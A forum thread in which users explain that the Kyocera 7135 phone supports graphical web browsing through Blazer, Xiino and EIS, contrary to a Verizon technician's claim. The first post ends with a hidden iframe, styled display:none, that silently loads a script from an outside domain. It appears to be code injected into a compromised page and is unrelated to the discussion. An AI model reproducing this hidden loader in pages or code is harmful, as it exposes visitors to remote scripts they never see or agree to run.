+ Reply to Thread

Web Browsing Question

I went to look at the demo at my local Verizon store and was told that there is no GUI web browser. I was also told by the in-store technician that all internet access using the 7135 is text based. Is this true? I was playing with the new WiFi Palm and it worked pretty well in the store, but I thought having a coast-to-coast wireless internet connection without having to be in a WiFi hotspot would be better solution. Can someone explain this to me? Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The glib response is that your Verizon tech is an idiot, which explains your problem. Actually, the 7135 is very good at displaying Web graphics and pictures. Find another Verizon store, or at least someone else in your store. Meantime, there are many discussion threads here concerning the uses and features of the phone's included and 3rd party Web browsers. (By the way, welcome!)

Re: Web Browsing Question

Originally posted by samari
    I went to look at the demo at my local Verizon store and was told that there is no GUI web browser. I was also told by the in-store technician that all internet access using the 7135 is text based. Is this true? I was playing with the new WiFi Palm and it worked pretty well in the store, but I thought having a coast-to-coast wireless internet connection without having to be in a WiFi hotspot would be better solution. Can someone explain this to me? Thanks.
    The tech's wrong. Eudora Web, the browser that comes installed on the phone, is text-only, but Blazer, Xiino, EIS (what other browsers am I missing, guys?) will do at least some graphics.

As an aside, and an utterly speculative, uninformed aside, I'm curious if WiFi will be that useful on a Palm. People have reported that the Palm's ability to take advantage of higher data rates on Express Network is limited by the processor speed. Even with the ARM processors, there's still a pretty significant difference between a Pentium and a 100mhz Palm processor that I would guess keeps WiFi's speed advantage at a much lower level.
    ---------------
    The same thing we do every night, Pinky...

Originally posted by ogakor
    The glib response is that your Verizon tech is an idiot, which explains your problem.
    See, now that's what I was going to say. But I thought it would be mean to say that on the Sabbath so I softened it.

Plus, I decided to give him the benefit of the doubt and assume that he had only been told about the Eudora browser on the phone and is trying to sell a 7135 despite lacking the basic knowledge of the ability to load Palm OS apps onto the phone (or in other words, he is an idiot, but like I said, I'm feeling generous today).
    ---------------

Re: Re: Web Browsing Question

Originally posted by BrerLapn
    Eudora Web, the browser that comes installed on the phone, is text-only, but Blazer, Xiino, EIS (what other browsers am I missing, guys?) will do at least some graphics.
    Small oops, BrerLapn, EIS is also included and installed on the phone.

Re: Re: Re: Web Browsing Question

Originally posted by ogakor
    Small oops, BrerLapn, EIS is also included and installed on the phone.
    Doh. I knew that, too; as I was typing I was trying to remember what app the Web icon launches. :eyesroll Maybe the tech's just an idiot, after all.
    ---------------